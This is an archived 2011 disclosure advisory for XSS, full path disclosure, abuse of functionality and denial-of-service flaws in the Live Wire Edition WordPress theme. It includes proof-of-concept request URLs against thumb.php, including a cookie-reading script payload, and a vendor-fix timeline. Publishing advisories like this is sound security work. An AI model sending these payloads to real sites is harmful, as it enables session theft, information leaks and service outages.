Live Wire 2.3.1 XSS / Disclosure / Denial Of Service

Live Wire 2.3.1 XSS / Disclosure / Denial Of Service: Posted Apr 8, 2011; Authored by MustLive; Live Wire Edition theme version 2.3.1 for WordPress suffers from cross site scripting, denial of service, path disclosure and abuse of functionality vulnerabilities.; tags | exploit, denial of service, vulnerability, xss; SHA-256 | 79b89bb2c36ba7e839e6894861693e23d1bfac75cb85db1f03d2104a7ce96832; Download | Favorite | View

Live Wire 2.3.1 XSS / Disclosure / Denial Of Service

Hello list!

I want to warn you about Cross-Site Scripting, Full path disclosure, Abuse
of Functionality and Denial of Service vulnerabilities in Live Wire Edition
theme for WordPress. It's commercial theme for WP by WooThemes.

-------------------------
Affected products:
-------------------------

Vulnerable are Live Wire Edition 2.3.1 and previous versions. XSS is
possible only in old versions of the theme. Recently in version Live Wire
Edition 2.4 most of these vulnerabilities were fixed (but there were still
left many not fixed FPD).

----------
Details:
----------

XSS (WASC-08):

http://site/wp-content/themes/livewire-edition/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg

Full path disclosure (WASC-13):

http://site/wp-content/themes/livewire-edition/thumb.php?src=jpg

http://site/wp-content/themes/livewire-edition/thumb.php?src=http://site/page.png&h=1&w=1111111

http://site/wp-content/themes/livewire-edition/thumb.php?src=http://site/page.png&h=1111111&w=1

http://site/wp-content/themes/livewire-edition/

And also other 30 php-scripts of the theme in folder /livewire-edition/ and
all subfolders.

Abuse of Functionality (WASC-42):

http://site/wp-content/themes/livewire-edition/thumb.php?src=http://site&h=1&w=1

DoS (WASC-10):

http://site/wp-content/themes/livewire-edition/thumb.php?src=http://site/big_file&h=1&w=1

About such AoF and DoS vulnerabilities I wrote in article Using of the sites
for attacks on other sites
(http://lists.grok.org.uk/pipermail/full-disclosure/2010-June/075384.html).

Beside folder /livewire-edition/, this theme also can be placed in folder
/livewire-package/ (which includes all three themes of Live Wire series).

------------
Timeline:
------------

2011.02.01 - announced at my site.
2011.02.01 - informed developers.
2011.02.04-12 - conversation about fixing holes in all their themes for
WordPress. At first they tried to fix all these holes in themes at their own
sites.
2011.03.28 - developers released version 2.4.
2011.04.08 - disclosed at my site.

I mentioned about these vulnerabilities at my site
(http://websecurity.com.ua/4893/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

Top Authors In Last 30 Days

Red Hat 221 files
Ubuntu 59 files
Debian 30 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 9 files
Apple 6 files
Milad Karimi 5 files
Google Security Research 5 files
tmrswrr 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,022)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,298)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,550)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,453)
UNIX (9,394)
UnixWare (187)
Windows (6,650)
Other

Live Wire 2.3.1 XSS / Disclosure / Denial Of Service

Live Wire 2.3.1 XSS / Disclosure / Denial Of Service

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Live Wire 2.3.1 XSS / Disclosure / Denial Of Service

Share This

Live Wire 2.3.1 XSS / Disclosure / Denial Of Service

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems